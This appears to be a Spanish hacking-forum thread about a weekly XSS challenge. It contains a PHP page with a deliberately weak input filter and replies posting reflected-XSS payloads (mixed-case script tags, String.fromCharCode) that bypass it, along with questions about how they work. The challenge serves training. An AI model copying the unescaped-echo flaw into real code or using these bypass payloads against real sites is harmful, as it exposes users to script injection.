<?php/* * Reto semanal HackxCrack By 2Fac3R * XSSme Lv.2 * */error_reporting(0);$reto = $_GET['nombre'];if(isset($reto) && !empty($reto)){ if(!preg_match("/(^<|'|\"|>$)/",$reto)){ // Que facil! no? echo 'Bienvenido!! '.$reto; }else{ echo "Estas intentando juakiarnos?"; }}else{ if(isset($_GET['send'])){ die("Debes ingresar tu nombre!"); } ?> <form action="" method="GET"> <input type="text" name="nombre"> <input type="submit" name="send" value="Prestarme!"> </form> <?}?>
http://127.0.0.1/asd/?nombre=a%3Cscript%3Ealert%28%2F11Sep%2F%29%3B%3C%2Fscript%3Ea&send=Prestarme%21
ret2Fac2.php?nombre=kid_<ScRiPt>alert(/kid_goth/)%3B</ScRiPt>goth&send=Prestarme!
 <script>alert(/zW Dice K rulee!/)</script> 
127.0.0.1/probar.php?nombre=2Fac<script>alert(String.fromCharCode(88, 83, 83, 101, 100))</script>3R&send=Prestarme!
si, si lo estoy<script>alert(String.fromCharCode(106,117,97,107,105,97,100,111,32,120,68))</script> xD
"/(^<|'|\"|>$)/"
Código: [Seleccionar]ret2Fac2.php?nombre=kid_<ScRiPt>alert(/kid_goth/)%3B</ScRiPt>goth&send=Prestarme!una pregunta ¿que hace el %3B en este codigo?? Por lo que entiendo hace que el / sea = a '' , ¡o no?
Cita de: [I]nfectedbug en Mayo 13, 2012, 08:09:29 pmCódigo: [Seleccionar]ret2Fac2.php?nombre=kid_<ScRiPt>alert(/kid_goth/)%3B</ScRiPt>goth&send=Prestarme!una pregunta ¿que hace el %3B en este codigo?? Por lo que entiendo hace que el / sea = a '' , ¡o no?Es equivalente a ; (punto y coma).Zalu2
fromCharCode(106,117,97,107,105,97,100,111,32,120,68)
Bueno, ya que estan respondiendo preguntas, tengo una duda con está:CitarfromCharCode(106,117,97,107,105,97,100,111,32,120,68)Se que se puede buscar en google, peró me gustaria aclararlo en el post .Ah y otra, es simplemente saver, si una comilla ( ' ), no es necesario "escapearla" ( \ ), en las expreciones regulares.